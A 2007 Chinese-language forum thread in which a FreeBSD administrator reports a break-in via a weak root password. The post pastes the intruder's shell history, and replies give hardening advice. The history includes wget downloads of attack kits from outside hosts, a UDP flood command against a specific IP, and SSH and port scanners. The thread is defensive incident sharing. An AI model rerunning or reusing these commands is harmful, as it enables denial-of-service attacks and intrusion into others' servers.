免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2690 | 回复: 8

服务器被黑了,贴部分历史纪录 [复制链接]

论坛徽章:
0
发表于 2007-03-29 11:50 |显示全部楼层
别人给装的系统FreeBSD6.2,密码太简单了(以前装的RHEL就被黑了,密码他们还没有改),我登陆上去时已经被人早就登陆了。
看了一下系统,给装了好几个软件,还有攻击的脚本。下面是部分历史纪录
who
reboot
ls
cd kits
ls
who
wall boo
w
w
ls
./spike.sh
perl spike.sh
perl udp.pl 89.38.201.240 80 0
uptime
w
who
w
ifconfig
cat /etc/hosts
free -m
who
mc
ls
cat spike.sh
ls
nano udppl
ls
tail
clear
cat /etc/hosdts
cat /etc/hosts
mysql
mysql -u root -p
cd /etc/verlihub
ls
cat dbconfig
tail dbconfig
mysql -u root -p
cd/home/kits
cd
ls
cd kits
ls
wget greet.host.sk/alecs.tgz
wget greet.host.sk/alecs.tgz
wget puricel.xhost.ro/ffa.tgz
wget help-bnc.sufx.net/fld.tar
wget ftp://ftp.vasili.ro/ftproot/fld.tar
tar zxvf fld.tar
ls
rm -rf fld.tar
cd fld
ls
cat v
clear
ls
./v
./j
./s
./sl
./std
perl udp.pl
perl j
perl std
cd ..
ls
wget rotz3p.evonet.ro/verli_pack.tar.gz
ls
rm -rf 404.html
wget rotz3p.evonet.ro/verli_pack.tar.gz
rm -rf 404.html
wget -m ftp://ftp.vasili.ro/ftproot/verli_pack
ls
rm -rf ftp.vasili.ro
wget ftp://ftp.vasili.ro/ftproot/verli_pack.tar.gz
tar zxvf verli_pack.tar.gz
ls
rm -rf verli_pack.tar.gz
cd verli_pack/
ls
tar zxvf floodprot.tar.gz
tar zxvf iplog.tar.gz
ls
lua-5.0.2.tar.gz
tar zxvf lua-5.0.2.tar.gz
ls
cd
ls
cd verlid
ls
cd verlihub
ls
cd plugins/
cd /kits
cd kits
cd /home/kits
cd /root/kits
cd /verlid
cd
cd verlid/verlihub
ls
cd plugins/
cp /root/kits/verli_pack/iplog /root/verlid/verlihub/plugins/
cp /root/kits/verli_pack/iplog.tar.gz /root/verlid/verlihub/plugins/
ls
cp /root/kits/verli_pack/floodprot.tar.gz /root/verlid/verlihub/plugins/
cp /root/kits/verli_pack/lua-5.0.2.tar.gz /root/verlid/verlihub/plugins/
ls
tar zxvf lua-5.0.2.tar.gz
tar zxvf iplog.tar.gz
ls
tar zxvf floodprot.tar.gz
ls
rm -rg iplog.tar.gz
rm -rf iplog.tar.gz
rm -rf floodprot.tar.gz
rm -rf lua-5.0.2.tar.gz
ls
cd iplog
./configure && make && make install
cd ..
cd floodprot/
./configure && make && make install
cd ..
cd lua-5.0.2/
./configure && make && make install
locate liblua
cd /usr/local/lib
ls
VERLIHUB_CFG=/etc/verlihub ulimit -n 10240 && VERLIHUB_CFG=/etc/verlihub vh_runhub
cd /etc/verlihub
ls
ulimit -n 10240
vh_runhub
/usr/local/bin/vh_runhub
cd /root/verlid
ls
cd verlihub
ls
ulimit -n 10240
vh_runhub
cd /usr/local/lib
ls
cd /root/verlid/verlihub
cd scripts/
vh_install
./vh_install
tracert www.yahoo.com
w
who
w
who
w
free -m
top
w
cat /var/mail/root
cd /var/www
cd /etc/httpd
who
cd
cd kits
ls
cd fld
ls
cd ..
wget http://greet.host.sk/alex.tgz
ls
cd ssteam
ls
perl start pscan2 222.134
perl pscan2 222.134
perl pscan2.pl 222.134
./go.sh
chmod 777 go.sh
./go.sh
chmod +x go.sh
./go.sh
./ssh-scan
chmod 777 ssh-scan
./ssh-scan
ls
./ss
chmod +x ss
./ss
w
/usr/local/bin/bash vh_restart /usr/local/bin/verlihub > /etc/verlihub/log &
who

[ 本帖最后由 suek 于 2007-3-29 11:53 编辑 ]

论坛徽章:
1
技术图书徽章
日期:2013-12-05 23:25:45
发表于 2007-03-29 12:15 |显示全部楼层
晕,被黑过了还不吸取教训啊?

作个最简单的吧,开启防火墙 http://www.freebsd.org/doc/zh_CN ... firewalls-ipfw.html

这个你贴出来,我们也不能给你多少帮助。
但是第一条,加强密码。

论坛徽章:
0
发表于 2007-03-29 13:16 |显示全部楼层
嗯。我吃饭前已经把密码验证关了,改成public key验证了。
吃过饭看一下,他既然又来了。。。
#who
root             ttyp1    Mar 29 12:13 (77.81.213.124)
现在我已经开了ipfw防火墙了(把另一个服务器上的规则复制了过去),把root远程登录的权限去掉了。
10040 allow tcp from 我的IP段 to me dst-port 22 in

[ 本帖最后由 suek 于 2007-3-29 13:23 编辑 ]

论坛徽章:
0
发表于 2007-03-29 14:00 |显示全部楼层
root远程登陆,MY GOD。

论坛徽章:
0
发表于 2007-03-29 14:11 |显示全部楼层
好牛的人啊,是哪个高手黑你的啊?强!!!不用root远程登陆怎么办啊?
那用wheel么?

论坛徽章:
0
发表于 2007-03-29 14:25 |显示全部楼层
知道是怎么被黑的吗?是漏洞?还是直接破的root密码?

论坛徽章:
1
技术图书徽章
日期:2013-12-05 23:25:45
发表于 2007-03-29 15:39 |显示全部楼层
原帖由 suek 于 2007-3-29 13:16 发表
嗯。我吃饭前已经把密码验证关了,改成public key验证了。
吃过饭看一下,他既然又来了。。。
#who
root             ttyp1    Mar 29 12:13 (77.81.213.124)
现在我已经开了ipfw防火墙了(把另一个服务器上的 ...



public key这个他都可以进来?
你自己的电脑先被人黑了么?

论坛徽章:
0
发表于 2007-03-29 19:49 |显示全部楼层
.

使用密码验证也没什么不好,别人要扫描也无大碍,最多给日志添几条记录吧。密码一定要难以猜测,比如

BiaUyk091IHftu
hIUOy965pUI78

这样大小写、数字搭配的。甚至可以带上符号:

[P6w$dg;SmR1tL
0&`YtweP'5tFWd

当然,这些都只是普通民用的安全策略。不难想象,军事、国防等领域的安全策略就更为复杂了。

.

论坛徽章:
9
CU大牛徽章
日期:2013-03-13 15:29:07CU大牛徽章
日期:2013-03-13 15:29:49CU大牛徽章
日期:2013-03-13 15:30:19CU大牛徽章
日期:2013-03-14 14:16:46CU大牛徽章
日期:2013-03-14 14:16:49CU大牛徽章
日期:2013-03-14 14:16:51CU大牛徽章
日期:2013-03-14 14:16:52处女座
日期:2014-06-11 10:34:40技术图书徽章
日期:2014-07-11 16:32:15
发表于 2007-03-29 19:58 |显示全部楼层
SSH的密码和public key登陆都开了?
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP